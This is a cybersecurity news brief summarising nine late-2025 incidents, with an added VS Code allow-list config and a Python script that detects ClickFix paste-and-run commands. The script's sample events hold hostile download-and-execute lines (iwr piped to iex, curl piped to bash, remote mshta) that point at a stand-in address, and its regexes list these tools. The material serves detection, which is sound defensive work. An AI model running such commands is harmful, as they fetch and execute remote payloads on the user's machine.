Svoboda Cybersecurity Brief November 07, 2025


Nevada Government Systems Compromised for Months Before Ransomware Attack

A ransomware attack on Nevada's state government systems in August 2025 began as early as May 2025, when a state employee downloaded a trojanized system administration tool. The attackers harvested credentials from 26 accounts and deleted backups before deploying ransomware; recovery costs now exceed $1.3M.
Impact: 60+ agencies disrupted, recovery costs exceeding $1.3M.
Mitigation: Centralized security operations and endpoint detection and response (EDR).
Source: BleepingComputer

Cisco Unified CCX Critical Vulnerabilities Allow Remote Code Execution

Cisco patched two critical vulnerabilities in its Unified Contact Center Express (Unified CCX) appliance: CVE-2025-20354, which lets an unauthenticated attacker upload crafted files and execute arbitrary commands as root, and CVE-2025-20358, which lets an unauthenticated attacker bypass authentication.
Impact: Full system compromise via root-level RCE, or administrative access without valid credentials.
Mitigation: Upgrade to a fixed release (12.5 SU3 ES07 or 15.0 ES01).
Source: BleepingComputer

Sandworm Deploys Data Wipers Against Ukrainian Grain Sector

The Russian state-linked group Sandworm (APT44) targeted Ukraine's grain, government, and energy sectors with the ZeroLot and Sting wipers during 2025, aiming to disrupt the economy. UAC-0099 provided the initial access for Sandworm's follow-up attacks.
Impact: Critical infrastructure sabotage and economic disruption.
Mitigation: Offline backups, endpoint detection and response, and network segmentation.
Source: BleepingComputer

SonicWall Confirms State-Sponsored Hackers Stole Firewall Backups

A state-sponsored actor stole every firewall configuration backup stored in SonicWall's cloud backup service in September 2025. The backups contain encrypted credentials; SonicWall says the theft occurred through unauthorized API access and is unrelated to the Akira ransomware attacks against SonicWall devices.
Impact: Credential exposure that enables targeted attacks on the affected firewalls. Treat every credential in the stolen backups as compromised even though it was stored encrypted.
Mitigation: Rotate credentials and secrets using SonicWall's remediation tooling; audit firewall configurations for unauthorized changes.
Source: The HackerNews

AI-Generated Ransomware Extension Sneaks into VS Code Marketplace

A malicious VS Code extension named "susvsex", likely AI-generated, exfiltrated files and encrypted them with AES-256-CBC. Although its own description openly stated what it did, Microsoft initially failed to remove it from the Marketplace.
Impact: Data theft and file encryption on the machines of developers who installed it.
Mitigation: Review extensions manually before installing; restrict installation to an allow-list of verified publishers.
Source: BleepingComputer
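A concrete form of the allow-list mitigation, added here as an example rather than taken from the brief or from Microsoft's documentation: it assumes VS Code's `extensions.allowed` setting, which recent VS Code releases support, and the publisher and extension names are illustrative. A publisher key admits everything that publisher ships, an extension ID admits one extension, and `false` on an ID blocks it even when its publisher is allowed; extensions not listed at all are blocked once the setting is defined.

```json
{
  "extensions.allowed": {
    "microsoft": true,
    "ms-python.python": true,
    "github.copilot": false
  }
}
```

Put this in the settings delivered through VS Code's enterprise policy mechanism rather than in a user's own settings.json, since a user can simply edit the latter; verify the setting's exact semantics against the documentation for the VS Code version you deploy.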

ClickFix Malware Evolves with Multi-OS Support and Video Tutorials

ClickFix campaigns now serve OS-aware video tutorials and countdown timers that pressure victims into pasting and running malicious commands. The lures impersonate Cloudflare CAPTCHA pages and are delivered through malvertising and compromised WordPress sites.
Impact: Credential theft and malware deployment (e.g., info-stealers).
Mitigation: Block known malvertising domains; alert on shells launched from the Run dialog or Terminal with download-and-execute command lines; educate users that no legitimate verification step asks them to paste commands.
Source: BleepingComputer
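The mitigation above is easier to operationalize with a concrete detection. The following is an added example, not code from the original brief or from any vendor it cites: it scans constructed Sysmon-style process-creation events for the command shapes ClickFix lures typically make victims paste (a hidden PowerShell window fetching and executing remote content, mshta loading a remote HTA, curl piped into bash on macOS, an encoded command, an execution-policy bypass) and marks which findings came from an interactive launch, which is the ClickFix signature: a person, not a script, ran the command. The hosts, the address 203.0.113.10 (a documentation range), the parent-process heuristic and the indicator names are assumptions for the example.

```python
import re

# Constructed sample process-creation events (simplified Sysmon/EDR fields).
# Hosts, addresses (203.0.113.0/24 is a documentation range) and commands are
# made up for this example; they are not from any real incident.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://203.0.113.10/a.txt | iex"'},
    {"host": "ws02", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://203.0.113.10/verify.hta"},
    {"host": "mac01", "parent": "Terminal", "image": "bash",
     "cmdline": 'bash -c "curl -fsSL http://203.0.113.10/fix.sh | bash"'},
    {"host": "ws03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"'},
    {"host": "dev03", "parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File build.ps1"},
]

# Command-line shapes commonly pasted in ClickFix lures. Each regex is matched
# case-insensitively against the full command line.
INDICATORS = [
    ("download-and-execute",
     r"\b(iwr|invoke-webrequest|curl|wget|certutil)\b.*\|\s*(iex|invoke-expression|bash|sh|zsh)\b"),
    ("mshta-remote-hta", r"\bmshta(\.exe)?\s+['\"]?https?://"),
    ("hidden-window", r"-(w|win|windowstyle)\s+hidden\b"),
    ("encoded-command", r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("execution-policy-bypass", r"-(ep|ex|executionpolicy)\s+bypass\b"),
]

# Parent processes that mean a human typed or pasted the command. Assumption for
# this example: explorer.exe spawns whatever is entered in the Win+R Run dialog,
# and Terminal is the macOS equivalent.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal"}


def classify(cmdline):
    """Return the names of all indicators that match one command line."""
    return [name for name, pattern in INDICATORS
            if re.search(pattern, cmdline, re.IGNORECASE)]


def detect(events):
    """Return one finding per event that matches at least one indicator.

    interactive_origin is True when the parent suggests a Run-dialog or
    Terminal launch; those findings deserve the highest priority.
    """
    findings = []
    for ev in events:
        hits = classify(ev["cmdline"])
        if not hits:
            continue
        findings.append({
            "host": ev["host"],
            "image": ev["image"],
            "indicators": hits,
            "interactive_origin": ev["parent"].lower() in INTERACTIVE_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        severity = "HIGH" if f["interactive_origin"] else "MEDIUM"
        print(f"{severity:6} {f['host']:6} {f['image']:15} {', '.join(f['indicators'])}")
```

The benign administrative command on ws03 produces no finding, and the build script on dev03 is reported at lower priority because its parent is an editor rather than the Run dialog. In production, also collect the Windows RunMRU registry key and clipboard-paste telemetry where your EDR exposes them, since the pasted command survives there even when process logging is incomplete.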

Pro-Russian Hackers Target Belgian Telecoms with DDoS Attacks

The pro-Russian hacktivist group NoName057(16) claimed responsibility for DDoS attacks against Proximus, Scarlet, and Ghent University Hospital that briefly disrupted their services. Telenet denied being affected despite being named in the group's claims.
Impact: Service outages; no data compromise reported.
Mitigation: Deploy DDoS mitigation services and monitor for traffic spikes.
Source: DataBreaches.net

Hyundai AutoEver America Discloses Data Breach

Hyundai AutoEver America, Hyundai's IT services arm, disclosed a breach in which attackers had access to its systems from February 22 to March 2, 2025, and obtained Social Security numbers and driver's license numbers. The intrusion was discovered in March 2025.
Impact: PII exposure for a limited number of individuals.
Mitigation: Notify affected individuals; enhance endpoint monitoring.
Source: SecurityWeek

AISURU Botnet Domains Flood Cloudflare Rankings

The AISURU botnet, made up of compromised IoT devices, generated enough DNS query volume through Cloudflare's public resolver to push its malicious domains to the top of Cloudflare's domain rankings. Cloudflare redacted the domains from the rankings after public scrutiny.
Impact: DNS service abuse and erosion of trust in popularity-based domain rankings.
Mitigation: Block the .su TLD where there is no business need for it; monitor for DNS query anomalies such as sudden high-volume lookups of newly seen domains from IoT network segments.
Source: KrebsOnSecurity
